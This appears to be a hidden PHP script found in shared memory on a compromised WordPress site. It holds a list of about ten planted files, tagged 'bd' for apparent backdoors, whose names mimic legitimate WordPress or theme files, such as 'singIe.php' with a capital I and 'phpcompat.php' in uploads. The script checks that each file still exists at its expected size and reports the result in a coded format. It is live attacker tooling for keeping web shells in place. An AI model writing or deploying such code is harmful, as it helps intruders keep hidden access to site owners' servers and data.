File: //var/run/shm/.fac
<?php $r = '/home/diamondtclassics.club/public_html'; $x = ["/frames_main.js.php"=>"bd@@673327@@671",
"/wp-content/themes/top-1747417535/connents.php"=>"bd@@719933@@1166",
"/mimetypes.inc.php"=>"bd@@577863@@658",
"/wp-includes/html-api/custom_functions_1751121321.php"=>"bd@@429691@@727",
"/wp-content/themes/front_page_template_1747906369/singIe.php"=>"bd@@704908@@731",
"/wp-content/extensions/custom-file-4-1751708027.php"=>"bd@@442023@@727",
"/wp-content/uploads/connections-images/index.php"=>"bd@@2454265@@26",
"/wp-content/uploads/mailster/dkim/index.php"=>"bd@@2454825@@88",
"/b4f8ce.php"=>"bd@@560917@@226",
"/wp-content/uploads/formidable/css/phpcompat.php"=>"bd@@2460193@@956"]; foreach ($x as $p => $l) { $f = "{$r}{$p}"; list($t, $id, $pt) = explode('@@', $l); if (!file_exists($f)) { print "<$t>{$id}##d</$t>\n"; continue; } if (is_numeric($pt)) { $fs = filesize($f); if ($fs != $pt) { print "<$t>{$id}##bs</$t>\n"; } } else { $c = file_get_contents($f); if (!strstr($c, $pt)) { print "<$t>{$id}##d</$t>\n"; } } } die('!end!');